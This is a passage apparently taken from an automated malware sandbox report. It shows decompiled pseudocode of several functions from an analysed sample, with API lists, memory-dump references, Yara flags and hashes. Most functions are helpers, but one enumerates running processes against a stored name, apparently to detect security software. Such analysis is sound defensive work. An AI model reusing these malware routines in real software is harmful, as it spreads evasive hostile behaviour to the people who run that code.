				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2bbd2e0; // 0x273a5a8
						_t2 = _t9 + 0x2bbee3c; // 0x73617661
						_push( &_v264);
						if( *0x2bbd110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                                                                                                                0x02bba1df
                                                                                                                                                                                                                                0x02bba1e9
                                                                                                                                                                                                                                0x02bba1ed
                                                                                                                                                                                                                                0x02bba1f7
                                                                                                                                                                                                                                0x02bba228
                                                                                                                                                                                                                                0x02bba1fe
                                                                                                                                                                                                                                0x02bba203
                                                                                                                                                                                                                                0x02bba210
                                                                                                                                                                                                                                0x02bba219
                                                                                                                                                                                                                                0x02bba230
                                                                                                                                                                                                                                0x02bba21b
                                                                                                                                                                                                                                0x02bba223
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba223
                                                                                                                                                                                                                                0x02bba231
                                                                                                                                                                                                                                0x02bba232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bba22c
                                                                                                                                                                                                                                0x02bba238
                                                                                                                                                                                                                                0x02bba23d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BBA1E4
                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02BBA1F7
                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02BBA223
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BBA232
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                • Opcode ID: f1d2e6f34bd27fffd62ea1a08ded4cabc247ee67bec35c3193a449750c66f3a3
                                                                                                                                                                                                                                • Instruction ID: 070da7d1718ceb5a8d9eb9588fa880c19b25c89716e05a54f042c9f213e8cb72
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d2e6f34bd27fffd62ea1a08ded4cabc247ee67bec35c3193a449750c66f3a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0F032D001246BD723BA269C08EFF76ACDFC6350F4000A1E986D3000EAE4CA968BB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1F47, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1F47() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2bbd2a4; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2bbd2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2bbd2a4; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2bbd270; // 0x4f00000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                                                                                                                0x02bb1f47
                                                                                                                                                                                                                                0x02bb1f4e
                                                                                                                                                                                                                                0x02bb1f98
                                                                                                                                                                                                                                0x02bb1f9a
                                                                                                                                                                                                                                0x02bb1f9a
                                                                                                                                                                                                                                0x02bb1f52
                                                                                                                                                                                                                                0x02bb1f58
                                                                                                                                                                                                                                0x02bb1f5d
                                                                                                                                                                                                                                0x02bb1f61
                                                                                                                                                                                                                                0x02bb1f67
                                                                                                                                                                                                                                0x02bb1f6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb1f70
                                                                                                                                                                                                                                0x02bb1f75
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb1f75
                                                                                                                                                                                                                                0x02bb1f77
                                                                                                                                                                                                                                0x02bb1f7f
                                                                                                                                                                                                                                0x02bb1f82
                                                                                                                                                                                                                                0x02bb1f82
                                                                                                                                                                                                                                0x02bb1f88
                                                                                                                                                                                                                                0x02bb1f8f
                                                                                                                                                                                                                                0x02bb1f92
                                                                                                                                                                                                                                0x02bb1f92
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(000002D8,00000001,02BB59AE), ref: 02BB1F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 02BB1F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(000002D8), ref: 02BB1F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(04F00000), ref: 02BB1F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 3c062294296cf0ac8be80e52e8e88b561a9b048a9573206307c3fa2e8cbbf5ec
                                                                                                                                                                                                                                • Instruction ID: cdcef9c28d6062b58d16728776aa3a925fc5a40edd59fe7e94fbfb44b43f28bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c062294296cf0ac8be80e52e8e88b561a9b048a9573206307c3fa2e8cbbf5ec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93F01C71F953139FDF22AB38D95CAA63AACEF156E17540A54B81CD71C0CBE4C810CA60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B814E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B814E3(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x2b841b0;
				_t19 = 0x104;
				_t23 = E02B82020(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E02B81F0A(_t23);
					_t23 = E02B82020(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E02B81F0A(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                                                                                                                                                                                                                                0x02b814f4
                                                                                                                                                                                                                                0x02b814f7
                                                                                                                                                                                                                                0x02b81501
                                                                                                                                                                                                                                0x02b81505
                                                                                                                                                                                                                                0x02b8155a
                                                                                                                                                                                                                                0x02b8155c
                                                                                                                                                                                                                                0x02b8155d
                                                                                                                                                                                                                                0x02b81562
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81507
                                                                                                                                                                                                                                0x02b81507
                                                                                                                                                                                                                                0x02b8150c
                                                                                                                                                                                                                                0x02b81512
                                                                                                                                                                                                                                0x02b81517
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8151e
                                                                                                                                                                                                                                0x02b81524
                                                                                                                                                                                                                                0x02b81532
                                                                                                                                                                                                                                0x02b81536
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81536
                                                                                                                                                                                                                                0x02b81538
                                                                                                                                                                                                                                0x02b8153c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81541
                                                                                                                                                                                                                                0x02b81551
                                                                                                                                                                                                                                0x02b81553
                                                                                                                                                                                                                                0x02b81543
                                                                                                                                                                                                                                0x02b81546
                                                                                                                                                                                                                                0x02b81546
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,02B8160E,?), ref: 02B8150C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,02B8160E,?), ref: 02B8154A
                                                                                                                                                                                                                                  • Part of subcall function 02B81F0A: HeapFree.KERNEL32(00000000,?,02B81558,00000000,?,?,?,02B8160E,?), ref: 02B81F16
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1691993961-1084903527
                                                                                                                                                                                                                                • Opcode ID: 24347e025d3ec36f0cb8f23710ff3ee3d39c0890f8ec88e2651843b151cf2c36
                                                                                                                                                                                                                                • Instruction ID: dab84ab7c513112743f6fc7fce8ab335b297c33d91683807ded9ad3580716e8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24347e025d3ec36f0cb8f23710ff3ee3d39c0890f8ec88e2651843b151cf2c36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201D872D22212A7C722765DDC449DFBBE9DF81B95B1501E2E90DE7100E770C942C7A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1EBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1EBA(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E02BB5157(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E02BB53BB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                                                                                                                                                0x02bb1ec3
                                                                                                                                                                                                                                0x02bb1ecd
                                                                                                                                                                                                                                0x02bb1ed1
                                                                                                                                                                                                                                0x02bb1ed9
                                                                                                                                                                                                                                0x02bb1edd
                                                                                                                                                                                                                                0x02bb1eec
                                                                                                                                                                                                                                0x02bb1ef1
                                                                                                                                                                                                                                0x02bb1ef1
                                                                                                                                                                                                                                0x02bb1edd
                                                                                                                                                                                                                                0x02bb1ef8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BB7528,73797325), ref: 02BB1ECB
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BB1EE5
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 7592df280b5756e6ccbecd926a47b9046e5d64e54aade10f888bbee4bb3a4aaa
                                                                                                                                                                                                                                • Instruction ID: 53b5fab6b2fcaf35b089b1e9a18afae664db7d235d0564814f0912d3032301a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7592df280b5756e6ccbecd926a47b9046e5d64e54aade10f888bbee4bb3a4aaa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0E04F3660253327823355AEAC58DEBDE9DEF92AE434501A5B90CD3210DFD0C911C6F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB18B3, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E02BB18B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02BB5157(_t2);
				if(_t34 != 0) {
					_t30 = E02BB5157(_t28);
					if(_t30 == 0) {
						E02BB53BB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02BBA962(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02BBA962(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                                                                                                                0x02bb18b3
                                                                                                                                                                                                                                0x02bb18bd
                                                                                                                                                                                                                                0x02bb18bf
                                                                                                                                                                                                                                0x02bb18c5
                                                                                                                                                                                                                                0x02bb18c5
                                                                                                                                                                                                                                0x02bb18ce
                                                                                                                                                                                                                                0x02bb18d2
                                                                                                                                                                                                                                0x02bb18de
                                                                                                                                                                                                                                0x02bb18e2
                                                                                                                                                                                                                                0x02bb1956
                                                                                                                                                                                                                                0x02bb18e4
                                                                                                                                                                                                                                0x02bb18e4
                                                                                                                                                                                                                                0x02bb18e8
                                                                                                                                                                                                                                0x02bb18ed
                                                                                                                                                                                                                                0x02bb18f2
                                                                                                                                                                                                                                0x02bb190c
                                                                                                                                                                                                                                0x02bb18fb
                                                                                                                                                                                                                                0x02bb18fb
                                                                                                                                                                                                                                0x02bb18ff
                                                                                                                                                                                                                                0x02bb1902
                                                                                                                                                                                                                                0x02bb1907
                                                                                                                                                                                                                                0x02bb1907
                                                                                                                                                                                                                                0x02bb1911
                                                                                                                                                                                                                                0x02bb1939
                                                                                                                                                                                                                                0x02bb193f
                                                                                                                                                                                                                                0x02bb1942
                                                                                                                                                                                                                                0x02bb1913
                                                                                                                                                                                                                                0x02bb1915
                                                                                                                                                                                                                                0x02bb191d
                                                                                                                                                                                                                                0x02bb1928
                                                                                                                                                                                                                                0x02bb192d
                                                                                                                                                                                                                                0x02bb192d
                                                                                                                                                                                                                                0x02bb1949
                                                                                                                                                                                                                                0x02bb1950
                                                                                                                                                                                                                                0x02bb1951
                                                                                                                                                                                                                                0x02bb1951
                                                                                                                                                                                                                                0x02bb18e2
                                                                                                                                                                                                                                0x02bb1961

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4,?,052F9618), ref: 02BB18BF
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                  • Part of subcall function 02BBA962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BB18ED,00000000,00000001,00000001,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618), ref: 02BBA970
                                                                                                                                                                                                                                  • Part of subcall function 02BBA962: StrChrA.SHLWAPI(?,0000003F,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4,?,052F9618,0000EA60,?), ref: 02BBA97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4), ref: 02BB191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 02BB192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BB1939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: ce7068a515c0dd917ce47598d509f154f16482a20862fbb5fd44248ad63b5438
                                                                                                                                                                                                                                • Instruction ID: a59cca9ef839f2cb5a6b32a67bdac12944865835c4fb6ec4faef6ace5be30ce7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce7068a515c0dd917ce47598d509f154f16482a20862fbb5fd44248ad63b5438
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21C372900295EFCB135F78CC58AFA7FB9EF4A784B054095FA899B201D7B0C901CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1FCE, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02BB5157(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                                                                                                                0x02bb1fe3
                                                                                                                                                                                                                                0x02bb1fe7
                                                                                                                                                                                                                                0x02bb1ff1
                                                                                                                                                                                                                                0x02bb1ff6
                                                                                                                                                                                                                                0x02bb1ffb
                                                                                                                                                                                                                                0x02bb1ffd
                                                                                                                                                                                                                                0x02bb2005
                                                                                                                                                                                                                                0x02bb200a
                                                                                                                                                                                                                                0x02bb2018
                                                                                                                                                                                                                                0x02bb201d
                                                                                                                                                                                                                                0x02bb2027

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,052F9364,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB1FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(02BB29B1,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB1FE5
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB2005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,02BB29B1,00000002,00000000,004F0053,747869A0,?,?,02BB29B1,004F0053,052F9364), ref: 02BB2018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: abe9b974f616c7513f847e31a274de4bd96ca5342695a7a6de216a569d2b9cec
                                                                                                                                                                                                                                • Instruction ID: ce7e375b0cebf5e9eda102a1ef5ac2b9cd3d4fb559d7974e313928b0468f3488
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abe9b974f616c7513f847e31a274de4bd96ca5342695a7a6de216a569d2b9cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F03C36900119FB8B12DFA8CC44CDF7BADEF493947414062A90497201E771EA108BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB2629, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 187ce6828b8aea169ab9aa0b6187ff98d1837b5df526b8f3bdef3288937b6bcb
                                                                                                                                                                                                                                • Instruction ID: 34f3d80bb64f146ed92b9dce26d69e2bf1bffe7e250280e0b9c00c67c125a583
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187ce6828b8aea169ab9aa0b6187ff98d1837b5df526b8f3bdef3288937b6bcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE09233D012216B87139BE4AC48CAFBFADEF8A7903040817F600D3100C7A489118BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%